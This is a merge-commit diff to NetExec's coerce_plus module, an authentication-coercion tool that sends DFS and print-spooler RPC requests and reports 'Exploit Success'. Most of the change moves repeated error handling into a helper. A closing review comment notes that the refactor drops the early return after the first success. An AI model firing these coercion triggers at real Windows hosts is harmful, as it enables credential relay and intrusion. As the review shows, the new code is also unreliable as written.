
Commit d61eec0

authored
Merge pull request Pennyw0rth#442 from Pennyw0rth/neff-improve-coerce_plus
Small fixes for coerce_plus
2 parents b59d823 + 83a16b6 commit d61eec0

1 file changed

Lines changed: 20 additions & 59 deletions


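--- a/nxc/modules/coerce_plus.py
+++ b/nxc/modules/coerce_plus.py
@@ -389,15 +389,7 @@ def exploit(self, dce, listener, always_continue, pipe):
 
 dce.request(request)
 except Exception as e:
-if str(e).find("rpc_s_access_denied") >= 0 or str(e).find("ERROR_BAD_NETPATH") >= 0 or str(e).find("RPC_S_INVALID_NET_ADDR") >= 0:
-self.context.log.debug("NetrDfsAddStdRootForced Success")
-self.context.log.highlight(f"Exploit Success, {pipe}\\NetrDfsAddStdRootForced")
-if not always_continue:
-return True
-elif str(e).find("ERROR_NOT_SUPPORTED") >= 0:
-self.context.log.debug("Not Vulnerable")
-else:
-self.context.log.debug(f"Something went wrong, check error status => {e!s}")
+self.handle_exception(request.__class__.__name__, always_continue, pipe, e)
 
 self.context.log.debug("Sending NetrDfsAddRootTarget!")
 try:
@@ -421,15 +413,7 @@ def exploit(self, dce, listener, always_continue, pipe):
 self.context.log.debug("NetrDfsAddRootTarget Success")
 return True
 except Exception as e:
-if str(e).find("rpc_s_access_denied") >= 0 or str(e).find("ERROR_BAD_NETPATH") >= 0 or str(e).find("RPC_S_INVALID_NET_ADDR") >= 0:
-self.context.log.debug("NetrDfsAddRootTarget Success")
-self.context.log.highlight(f"Exploit Success, {pipe}\\NetrDfsAddRootTarget")
-if not always_continue:
-return True
-elif str(e).find("ERROR_NOT_SUPPORTED") >= 0:
-self.context.log.debug("Not Vulnerable")
-else:
-self.context.log.debug(f"Something went wrong, check error status => {e!s}")
+self.handle_exception(request.__class__.__name__, always_continue, pipe, e)
 
 # Private exploit
 self.context.log.debug("Sending NetrDfsRemoveRootTarget!")
@@ -448,13 +432,7 @@ def exploit(self, dce, listener, always_continue, pipe):
 self.context.log.debug("NetrDfsRemoveRootTarget Success")
 return True
 except Exception as e:
-if str(e).find("rpc_s_access_denied") >= 0 or str(e).find("ERROR_BAD_NETPATH") >= 0 or str(e).find("RPC_S_INVALID_NET_ADDR") >= 0:
-self.context.log.debug("NetrDfsRemoveRootTarget Success")
-self.context.log.highlight(f"Exploit Success, {pipe}\\NetrDfsRemoveRootTarget")
-if not always_continue:
-return True
-else:
-self.context.log.debug(f"Something went wrong, check error status => {e!s}")
+self.handle_exception(request.__class__.__name__, always_continue, pipe, e)
 
 self.context.log.debug("Sending NetrDfsManagerInitialize!")
 try:
@@ -469,15 +447,7 @@ def exploit(self, dce, listener, always_continue, pipe):
 
 dce.request(request)
 except Exception as e:
-if str(e).find("rpc_s_access_denied") >= 0 or str(e).find("ERROR_BAD_NETPATH") >= 0 or str(e).find("RPC_S_INVALID_NET_ADDR") >= 0:
-self.context.log.debug("NetrDfsAdd Success")
-self.context.log.highlight(f"Exploit Success, {pipe}\\NetrDfsAdd")
-if not always_continue:
-return True
-elif str(e).find("ERROR_NOT_SUPPORTED") >= 0:
-self.context.log.debug("Not Vulnerable")
-else:
-self.context.log.debug(f"Something went wrong, check error status => {e!s}")
+self.handle_exception(request.__class__.__name__, always_continue, pipe, e)
 
 self.context.log.debug("Sending NetrDfsManagerInitialize!")
 try:
@@ -492,15 +462,7 @@ def exploit(self, dce, listener, always_continue, pipe):
 
 dce.request(request)
 except Exception as e:
-if str(e).find("rpc_s_access_denied") >= 0 or str(e).find("ERROR_BAD_NETPATH") >= 0 or str(e).find("RPC_S_INVALID_NET_ADDR") >= 0:
-self.context.log.debug("NetrDfsAdd Success")
-self.context.log.highlight(f"Exploit Success, {pipe}\\NetrDfsAdd")
-if not always_continue:
-return True
-elif str(e).find("ERROR_NOT_SUPPORTED") >= 0:
-self.context.log.debug("Not Vulnerable")
-else:
-self.context.log.highlight(f"Something went wrong, check error status => {e!s}")
+self.handle_exception(request.__class__.__name__, always_continue, pipe, e)
 
 self.context.log.debug("Sending NetrDfsAddStdRoot!")
 try:
@@ -511,13 +473,7 @@ def exploit(self, dce, listener, always_continue, pipe):
 request["ApiFlags"] = 0
 dce.request(request)
 except Exception as e:
-if str(e).find("rpc_s_access_denied") >= 0 or str(e).find("ERROR_BAD_NETPATH") >= 0 or str(e).find("RPC_S_INVALID_NET_ADDR") >= 0:
-self.context.log.debug("NetrDfsAddStdRoot Success")
-self.context.log.highlight(f"Exploit Success, {pipe}\\NetrDfsAddStdRoot")
-if not always_continue:
-return True
-else:
-self.context.log.debug(f"Something went wrong, check error status => {e!s}")
+self.handle_exception(request.__class__.__name__, always_continue, pipe, e)
 
 self.context.log.debug("Sending NetrDfsRemoveStdRoot!")
 try:
@@ -527,13 +483,18 @@ def exploit(self, dce, listener, always_continue, pipe):
 request["ApiFlags"] = 0
 dce.request(request)
 except Exception as e:
-if str(e).find("rpc_s_access_denied") >= 0 or str(e).find("ERROR_BAD_NETPATH") >= 0 or str(e).find("RPC_S_INVALID_NET_ADDR") >= 0:
-self.context.log.debug("NetrDfsRemoveStdRoot Success")
-self.context.log.highlight(f"Exploit Success, {pipe}\\NetrDfsRemoveStdRoot")
-if not always_continue:
-return True
-else:
-self.context.log.debug(f"Something went wrong, check error status => {e!s}")
+self.handle_exception(request.__class__.__name__, always_continue, pipe, e)
+
+def handle_exception(self, method_name, always_continue, pipe, e):
+if str(e).find("rpc_s_access_denied") >= 0 or str(e).find("ERROR_BAD_NETPATH") >= 0 or str(e).find("RPC_S_INVALID_NET_ADDR") >= 0:
+self.context.log.debug(f"{method_name} Success")
+self.context.log.highlight(f"Exploit Success, {pipe}\\{method_name}")
+if not always_continue:
+return True
+elif str(e).find("ERROR_NOT_SUPPORTED") >= 0:
+self.context.log.debug("Not Vulnerable")
+else:
+self.context.log.debug(f"Something went wrong, check error status => {e!s}")
 
 
 class PetitPotamtTrigger:
@@ -868,7 +829,7 @@ def exploit(self, dce, listener, target, always_continue, pipe):
 
 self.context.log.debug("Sending RpcRemoteFindFirstPrinterChangeNotification!")
 try:
-resp = rprn.hRpcOpenPrinter(dce, "\\\\%s\x00" % target)
+resp = rprn.hRpcOpenPrinter(dce, f"\\\\{target}\x00")
 except Exception as e:
 if str(e).find("Broken pipe") >= 0:
 # The connection timed-out. Let's try to bring it back next round
@@ -892,7 +853,7 @@ def exploit(self, dce, listener, target, always_continue, pipe):
 request["pBuffer"] = NULL
 dce.request(request)
 except Exception as e:
-if str(e).find("rpc_s_access_denied") >= 0:
+if str(e).find("rpc_s_access_denied") >= 0 or str(e).find("RPC_S_SERVER_UNAVAILABLE") >= 0:
 self.context.log.debug("RpcRemoteFindFirstPrinterChangeNotification Success")
 self.context.log.highlight(f"Exploit Success, {pipe}\\RpcRemoteFindFirstPrinterChangeNotification")
 if not always_continue: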
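Review bot: The early exit is lost at every call site in `exploit(self, dce, listener, always_continue, pipe)`: the removed blocks ran `return True` inside `exploit` when `always_continue` was false, while the seven new `self.handle_exception(request.__class__.__name__, always_continue, pipe, e)` calls discard the helper's result, so `exploit` goes on to send the remaining requests after the first success. For an authorised check that means more RPC calls and coerced authentication attempts against the target than the operator asked for, and the value `exploit` finally returns may no longer reflect the success (its body starts and ends outside these hunks, so this part is inferred). Each call site should propagate the result, `if self.handle_exception(request.__class__.__name__, always_continue, pipe, e):` followed by `return True`, and the helper should end with an explicit `return False` plus a one-line docstring stating that a true result means the caller must stop. Separately, the last hunk now counts `RPC_S_SERVER_UNAVAILABLE` as success; a short comment on why that status indicates a triggered callback would help whoever reads the results judge false positives.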
